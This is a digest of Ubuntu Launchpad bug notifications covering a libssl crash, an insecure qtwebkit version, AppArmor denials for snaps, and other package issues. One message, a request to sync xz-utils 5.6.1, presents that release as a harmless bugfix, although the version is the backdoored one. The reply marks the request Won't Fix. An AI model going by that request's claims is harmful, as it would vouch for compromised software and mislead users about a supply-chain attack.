[Touch-packages] [Bug 2063271] Re: Illegal opcode in libssl
Thanks for reporting this issue - but it is strange since this update has been published since 2024-02-27 and this is the first such report of any issues. Also given this update has been available for nearly 2 months it is surprising you are seeing errors from it so much later - I wonder if instead whether the on-disk binary has been corrupted? Can you please try reinstalling libssl3 and see if that resolves the issue: sudo apt install --reinstall libssl3 If this does resolve the issue, it might be worth checking whether you have any failing hardware / disks etc that may have led to this problem. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/2063271 Title: Illegal opcode in libssl Status in openssh package in Ubuntu: New Bug description: Many programs using openssl now fail, typically with messages such as Illegal instruction (core dumped) This seems to be a serious error, since it affects, for example, update-manager. Since this makes it harder to get security updates, I would also consider it a security vulnerability. The issue seems to be that openssl seems to be an attempt to use an illegal opcode. A few sample entries in /var/log/syslog are: Apr 21 19:16:39 einstein kernel: [495465.431588] traps: update-manager[396881] trap invalid opcode ip:740964b8ac6b sp:7409552125b0 error:0 in libssl.so.3[740964b7a000+5b000] Apr 21 19:16:55 einstein kernel: [495482.104658] traps: python3[396949] trap invalid opcode ip:73607be8ac6b sp:736074d8d5b0 error:0 in libssl.so.3[73607be7a000+5b000] Apr 21 19:40:05 einstein kernel: [496871.653271] traps: chrome-gnome-sh[397293] trap invalid opcode ip:79432ffa7c6b sp:7ffd6bc03e70 error:0 in libssl.so.3[79432ff97000+5b000] Apr 22 16:23:08 einstein kernel: [501744.765118] traps: check-new-relea[400397] trap invalid opcode ip:797c7cc8ac6b sp:797c6cace5b0 error:0 in libssl.so.3[797c7cc7a000+5b000] Apr 23 15:08:03 einstein kernel: [518701.050526] traps: wget[443588] trap invalid opcode ip:73a8b2eb4c6b sp:7ffc04918740 error:0 in libssl.so.3[73a8b2ea4000+5b000] Apr 23 15:12:55 einstein kernel: [518992.493020] traps: curl[443851] trap invalid opcode ip:7e4e3951dc6b sp:7ffc804d2ed0 error:0 in libssl.so.3[7e4e3950d000+5b000] Apr 23 15:13:32 einstein kernel: [519029.181422] traps: apport-gtk[04] trap invalid opcode ip:7039180f5c6b sp:703902bfaad0 error:0 in libssl.so.3[7039180e5000+5b000] This bug report itself had to be submitted manually since ubuntu-bug now itself fails. lsb_release -rd reports: Description:Ubuntu 22.04.4 LTS Release:22.04 apt-cache policy openssl reports: openssl: Installed: 3.0.2-0ubuntu1.15 Candidate: 3.0.2-0ubuntu1.15 Version table: *** 3.0.2-0ubuntu1.15 500 500 http://us.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages 500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages 100 /var/lib/dpkg/status 3.0.2-0ubuntu1 500 500 http://us.archive.ubuntu.com/ubuntu jammy/main amd64 Packages /proc/version for my computer gives Linux version 6.5.0-28-generic (buildd@lcy02-amd64-098) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #29~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 4 14:39:20 UTC 2 /proc/cpuinfo for my computer starts processor : 0 vendor_id : GenuineIntel cpu family: 6 model : 78 model name: Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz stepping : 3 microcode : 0xf0 cpu MHz : 500.018 cache size: 4096 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid: 0 initial apicid: 0 fpu : yes fpu_exception : yes cpuid level : 22 wp: yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid mpx rdseed adx smap clflushopt intel_pt xsaveopt xsavec xgetbv1 xsaves dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp md_clear flush_l1d arch_capabilities bugs : cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs itlb_multihit srbds mmio_stale_data retbleed gds bogomips : 5199.98 clflush size : 64 cache_alignment : 64 address sizes : 39 bits physical, 48
[Touch-packages] [Bug 2061191]
Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures ** Tags added: community-security ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to qtwebkit-opensource-src in Ubuntu. https://bugs.launchpad.net/bugs/2061191 Title: Probably stone-age old and insecure version with remote code execution Status in qtwebkit-opensource-src package in Ubuntu: New Bug description: Hi, Ubuntu 24.04 beta still uses libqt5webkit5. It is not obvious, where it comes from, but the version is still an alpha4, and the link in the README seems to suggest, that it still comes from https://github.com/annulen/webkit, which redirects to https://github.com/qtwebkit/qtwebkit , where the alpha4 tag is over 4 years old. There, the latest README tells: Code in this repository is obsolete. If you are looking for up-to-date QtWebKit use this fork: https://github.com/movableink/webkit https://github.com/movableink/webkit seems to be still maintained – more or less. And calls itself "inofficial mirror" Have a look at https://blogs.gnome.org/mcatanzaro/2022/11/04/stop-using-qtwebkit/ which calls qtwebkit insecure, poorly maintained, and cites CVEs about remote code execution (some of them would have to be fixed in the fork, but probably not in the version here in ubuntu). The problem is, that tools like wkhtmltopdf do use this library and are typically used to pull contents from a given URL, i.e. from foreign websites. Processing foreign HTML and Javascript code in conjunction with vulnerabilities to remote code execution, this is highly dangerous. ProblemType: Bug DistroRelease: Ubuntu 24.04 Package: libqt5webkit5 5.212.0~alpha4-34ubuntu4 ProcVersionSignature: Ubuntu 6.8.0-22.22-generic 6.8.1 Uname: Linux 6.8.0-22-generic x86_64 ApportVersion: 2.28.0-0ubuntu1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Fri Apr 12 23:31:43 2024 InstallationDate: Installed on 2024-04-12 (0 days ago) InstallationMedia: Kubuntu 24.04 LTS "Noble Numbat" - Beta amd64 (20240411.2) SourcePackage: qtwebkit-opensource-src UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/qtwebkit-opensource-src/+bug/2061191/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2061856]
Thanks for taking the time to report this bug and helping to make Ubuntu better. Your bug report is more likely to get attention if it is made in English, since this is the language understood by the majority of Ubuntu developers. Additionally, please only mark a bug as "security" if it shows evidence of allowing attackers to cross privilege boundaries or to directly cause loss of data/privacy. Please feel free to report any other bugs you may find. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/2061856 Title: gnome terminal Status in xorg package in Ubuntu: Incomplete Bug description: Ola Bomdia Eu estou com um problema no terminal shell do ubuntu ele esta fechando assim que clico para abrir elefecha automaticamente ja tentetei usar outro terminal e tambem faz a mesma coisa eu tenho o fish instalado tambem mas esta fazendo a mesma coisa fechando automaticamente, o unico que funciona e o terminal do vscode. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: xorg 1:7.7+19ubuntu7.1 ProcVersionSignature: Ubuntu 4.15.0-213.224-generic 4.15.18 Uname: Linux 4.15.0-213-generic i686 .tmp.unity_support_test.0: ApportVersion: 2.20.9-0ubuntu7.29 Architecture: i386 CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: None Date: Tue Apr 16 12:04:00 2024 DistUpgraded: Fresh install DistroCodename: bionic DistroVariant: ubuntu ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation Core Processor Integrated Graphics Controller [8086:0042] (rev 12) (prog-if 00 [VGA controller]) Subsystem: Elitegroup Computer Systems Core Processor Integrated Graphics Controller [1019:1324] InstallationDate: Installed on 2023-07-23 (267 days ago) InstallationMedia: Ubuntu 16.04.2 LTS "Xenial Xerus" - Release i386 (20170215.2) Lsusb: Bus 002 Device 006: ID 04f3:0210 Elan Microelectronics Corp. Optical Mouse Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: MEGAWARE H55H-CM ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-213-generic root=UUID=3cfdb2f5-e8ec-4728-844a-29c984321037 ro quiet splash vt.handoff=1 Renderer: Software SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 05/18/2010 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 080015 dmi.board.asset.tag: To Be Filled By O.E.M. dmi.board.name: MW-H55H-CM dmi.board.vendor: MEGAWARE dmi.board.version: 1.0 dmi.chassis.asset.tag: M0418501001 dmi.chassis.type: 3 dmi.chassis.vendor: MEGAWARE dmi.chassis.version: 1.0 dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr080015:bd05/18/2010:svnMEGAWARE:pnH55H-CM:pvrMEGAWARE:rvnMEGAWARE:rnMW-H55H-CM:rvr1.0:cvnMEGAWARE:ct3:cvr1.0: dmi.product.family: To Be Filled By O.E.M. dmi.product.name: H55H-CM dmi.product.version: MEGAWARE dmi.sys.vendor: MEGAWARE version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1 version.libdrm2: libdrm2 2.4.101-2~18.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 20.0.8-0ubuntu1~18.04.1 version.libgl1-mesa-glx: libgl1-mesa-glx 20.0.8-0ubuntu1~18.04.1 version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.15 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1 version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20171229-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2 xserver.bootTime: Thu Apr 4 13:22:01 2024 xserver.configfile: default xserver.devices: inputPower Button KEYBOARD, id 6 inputPower Button KEYBOARD, id 7 inputPS/2+USB Mouse MOUSE, id 8 inputAT Translated Set 2 keyboard KEYBOARD, id 9 xserver.logfile: /var/log/Xorg.0.log xserver.version: 2:1.19.6-1ubuntu4.15 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/2061856/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2061856] Re: gnome terminal
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public ** Changed in: xorg (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/2061856 Title: gnome terminal Status in xorg package in Ubuntu: Incomplete Bug description: Ola Bomdia Eu estou com um problema no terminal shell do ubuntu ele esta fechando assim que clico para abrir elefecha automaticamente ja tentetei usar outro terminal e tambem faz a mesma coisa eu tenho o fish instalado tambem mas esta fazendo a mesma coisa fechando automaticamente, o unico que funciona e o terminal do vscode. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: xorg 1:7.7+19ubuntu7.1 ProcVersionSignature: Ubuntu 4.15.0-213.224-generic 4.15.18 Uname: Linux 4.15.0-213-generic i686 .tmp.unity_support_test.0: ApportVersion: 2.20.9-0ubuntu7.29 Architecture: i386 CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: None Date: Tue Apr 16 12:04:00 2024 DistUpgraded: Fresh install DistroCodename: bionic DistroVariant: ubuntu ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation Core Processor Integrated Graphics Controller [8086:0042] (rev 12) (prog-if 00 [VGA controller]) Subsystem: Elitegroup Computer Systems Core Processor Integrated Graphics Controller [1019:1324] InstallationDate: Installed on 2023-07-23 (267 days ago) InstallationMedia: Ubuntu 16.04.2 LTS "Xenial Xerus" - Release i386 (20170215.2) Lsusb: Bus 002 Device 006: ID 04f3:0210 Elan Microelectronics Corp. Optical Mouse Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: MEGAWARE H55H-CM ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-213-generic root=UUID=3cfdb2f5-e8ec-4728-844a-29c984321037 ro quiet splash vt.handoff=1 Renderer: Software SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 05/18/2010 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 080015 dmi.board.asset.tag: To Be Filled By O.E.M. dmi.board.name: MW-H55H-CM dmi.board.vendor: MEGAWARE dmi.board.version: 1.0 dmi.chassis.asset.tag: M0418501001 dmi.chassis.type: 3 dmi.chassis.vendor: MEGAWARE dmi.chassis.version: 1.0 dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr080015:bd05/18/2010:svnMEGAWARE:pnH55H-CM:pvrMEGAWARE:rvnMEGAWARE:rnMW-H55H-CM:rvr1.0:cvnMEGAWARE:ct3:cvr1.0: dmi.product.family: To Be Filled By O.E.M. dmi.product.name: H55H-CM dmi.product.version: MEGAWARE dmi.sys.vendor: MEGAWARE version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1 version.libdrm2: libdrm2 2.4.101-2~18.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 20.0.8-0ubuntu1~18.04.1 version.libgl1-mesa-glx: libgl1-mesa-glx 20.0.8-0ubuntu1~18.04.1 version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.15 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1 version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20171229-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2 xserver.bootTime: Thu Apr 4 13:22:01 2024 xserver.configfile: default xserver.devices: inputPower Button KEYBOARD, id 6 inputPower Button KEYBOARD, id 7 inputPS/2+USB Mouse MOUSE, id 8 inputAT Translated Set 2 keyboard KEYBOARD, id 9 xserver.logfile: /var/log/Xorg.0.log xserver.version: 2:1.19.6-1ubuntu4.15 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/2061856/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2062440] Re: A few days ago I realized that the time was four hours behind despite it being automatic with the correct time zone.
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tzdata in Ubuntu. https://bugs.launchpad.net/bugs/2062440 Title: A few days ago I realized that the time was four hours behind despite it being automatic with the correct time zone. Status in tzdata package in Ubuntu: New Bug description: A few days ago I realized that the time was four hours behind despite it being automatic with the correct time zone. root@lmobile4dcda1:/etc# apt reinstall tzdata Reading package lists... Done Building dependency tree... Done Reading state information... Done 0 upgraded, 0 newly installed, 1 reinstalled, 0 to remove and 0 not upgraded. Need to get 348 kB of archives. After this operation, 0 B of additional disk space will be used. Get:1 https://mirror.mia.velocihost.net/ubuntu jammy-updates/main amd64 tzdata all 2024a-0ubuntu0.22.04 [348 kB] Fetched 348 kB in 6s (61,9 kB/s) Preconfiguring packages ... (Reading database ... 244685 files and directories currently installed.) Preparing to unpack .../tzdata_2024a-0ubuntu0.22.04_all.deb ... Unpacking tzdata (2024a-0ubuntu0.22.04) over (2024a-0ubuntu0.22.04) ... Setting up tzdata (2024a-0ubuntu0.22.04) ... Current default time zone: 'America/Caracas' Local time is now: jue 18 abr 2024 17:11:26 -04. Universal Time is now: Thu Apr 18 21:11:26 UTC 2024. Run 'dpkg-reconfigure tzdata' if you wish to change it. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: tzdata 2024a-0ubuntu0.22.04 ProcVersionSignature: Ubuntu 6.5.0-27.28~22.04.1-generic 6.5.13 Uname: Linux 6.5.0-27-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.5 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: GNOME Date: Thu Apr 18 16:52:36 2024 InstallationDate: Installed on 2023-11-18 (151 days ago) InstallationMedia: Ubuntu 22.04.3 LTS "Jammy Jellyfish" - Release amd64 (20230807.2) PackageArchitecture: all SourcePackage: tzdata UpgradeStatus: Upgraded to jammy on 2024-01-06 (103 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tzdata/+bug/2062440/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2059417] Re: Sync xz-utils 5.6.1-1 (main) from Debian unstable (main)
Given this has been reverted in Debian, it should not be synced into Ubuntu. ** Changed in: xz-utils (Ubuntu) Status: New => Won't Fix -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xz-utils in Ubuntu. https://bugs.launchpad.net/bugs/2059417 Title: Sync xz-utils 5.6.1-1 (main) from Debian unstable (main) Status in xz-utils package in Ubuntu: Won't Fix Bug description: Please sync xz-utils 5.6.1-1 (main) from Debian unstable (main) Hello! I am one of the upstream maintainers for XZ Utils. Version 5.6.1 was recently released and uploaded to Debian as a bugfix only release. Notably, this fixes a bug that causes Valgrind to issue a warning on any application dynamically linked with liblzma. This includes a lot of important applications. This could break build scripts and test pipelines that expect specific output from Valgrind in order to pass. Additionally, this fixes a small typo for the man pages translations for Brazilian Portuguese, German, French, Korean, Romanian, and Ukrainian, and removes the need for patches applied for version 5.6.0-0.2. The other bugfixes in this release have no impact on Ubuntu. They involve building with CMake or when building on a system without Landlock system calls defined (these are defined in Ubuntu). Changelog entries since current noble version 5.6.0-0.2: xz-utils (5.6.1-1) unstable; urgency=medium * Non-maintainer upload. * Import 5.6.1 (Closes: #1067708). * Takeover maintenance of the package. -- Sebastian Andrzej Siewior Wed, 27 Mar 2024 22:53:21 +0100 Excerpt from the NEWS entry from upstream: 5.6.1 (2024-03-09) * liblzma: Fixed two bugs relating to GNU indirect function (IFUNC) with GCC. The more serious bug caused a program linked with liblzma to crash on start up if the flag -fprofile-generate was used to build liblzma. The second bug caused liblzma to falsely report an invalid write to Valgrind when loading liblzma. * xz: Changed the messages for thread reduction due to memory constraints to only appear under the highest verbosity level. * Build: - Fixed a build issue when the header file was present on the system but the Landlock system calls were not defined in . - The CMake build now warns and disables NLS if both gettext tools and pre-created .gmo files are missing. Previously, this caused the CMake build to fail. * Minor improvements to man pages. * Minor improvements to tests. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
Ok whilst I still can't see the /StatusNotifierItem object listed via d-feet I can reproduce the denials when launching element-desktop so I have added some additional changes to the aforementioned PR which resolve these as well. With all the changes from that PR in place all of these mentioned denials are resolved. ** Changed in: snapd Status: New => In Progress -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056696 Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors Status in snapd: In Progress Status in apparmor package in Ubuntu: Confirmed Bug description: OS: Kubuntu Noble 24.04 Alpha (two-day old install) snapd version: 2.61.2 Affected Snaps: firefox, thunderbird, element-desktop Steps to reproduce: # For Firefox: 1. Open the Firefox Snap. 2. Open https://www.bennish.net/web-notifications.html. 3. Click "Authorize" and allow the website to send notifications. 4. Click "Show". Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback. # For Thunderbird: 1. Open the Thunderbird Snap. 2. Ensure you are connected to an email account. 3. Unfocus the Thunderbird window. 4. Wait for an email to come through. Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback. # For Element: 1. Open the Element Snap. Expected result: An apptray indicator should appear in the system tray with the Element logo. Actual result: No such indicator appears. 2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through. Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: No notification appears at all. Additional information: Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries: ``` = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access ``` Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault. This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422, however it seems as if Element is trying to hit the right paths and interfaces and is still being denied (based on looking at the info in https://github.com/snapcore/snapd/blob/master/interfaces/builtin/desktop_legacy.go and comparing the paths and interfaces there with the paths and interfaces shown by snappy-debug. I talked about this issue with Erich Eickmeyer and he mentioned that it occurred after a Plasma update. This
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
The subsequent error is: Main script file /usr/lib/x86_64-linux- gnu/calamares/modules/automirror/main.py for python job automirror raised an exception. Is there any way I can debug this further? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056696 Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors Status in snapd: New Status in apparmor package in Ubuntu: Confirmed Bug description: OS: Kubuntu Noble 24.04 Alpha (two-day old install) snapd version: 2.61.2 Affected Snaps: firefox, thunderbird, element-desktop Steps to reproduce: # For Firefox: 1. Open the Firefox Snap. 2. Open https://www.bennish.net/web-notifications.html. 3. Click "Authorize" and allow the website to send notifications. 4. Click "Show". Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback. # For Thunderbird: 1. Open the Thunderbird Snap. 2. Ensure you are connected to an email account. 3. Unfocus the Thunderbird window. 4. Wait for an email to come through. Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback. # For Element: 1. Open the Element Snap. Expected result: An apptray indicator should appear in the system tray with the Element logo. Actual result: No such indicator appears. 2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through. Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: No notification appears at all. Additional information: Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries: ``` = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access ``` Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault. This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422, however it seems as if Element is trying to hit the right paths and interfaces and is still being denied (based on looking at the info in https://github.com/snapcore/snapd/blob/master/interfaces/builtin/desktop_legacy.go and comparing the paths and interfaces there with the paths and interfaces shown by snappy-debug. I talked about this issue with Erich Eickmeyer and he mentioned that it occurred after a Plasma update. This doesn't make a great deal of sense to me, and I suspect possibly some other component of the affected systems happened to get updated at the same time (perhaps the snapd Snap),
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
Ah although it seems I can reboot the VM at this point and whilst Calamares appeared to run again again in the rebooted vm if I choose Install Calamares closes and I see the installed kubuntu environment - weird Anyway I think I will be able to use this to debug the original issue further - will continue and let you know what I find. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056696 Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors Status in snapd: New Status in apparmor package in Ubuntu: Confirmed Bug description: OS: Kubuntu Noble 24.04 Alpha (two-day old install) snapd version: 2.61.2 Affected Snaps: firefox, thunderbird, element-desktop Steps to reproduce: # For Firefox: 1. Open the Firefox Snap. 2. Open https://www.bennish.net/web-notifications.html. 3. Click "Authorize" and allow the website to send notifications. 4. Click "Show". Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback. # For Thunderbird: 1. Open the Thunderbird Snap. 2. Ensure you are connected to an email account. 3. Unfocus the Thunderbird window. 4. Wait for an email to come through. Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback. # For Element: 1. Open the Element Snap. Expected result: An apptray indicator should appear in the system tray with the Element logo. Actual result: No such indicator appears. 2. 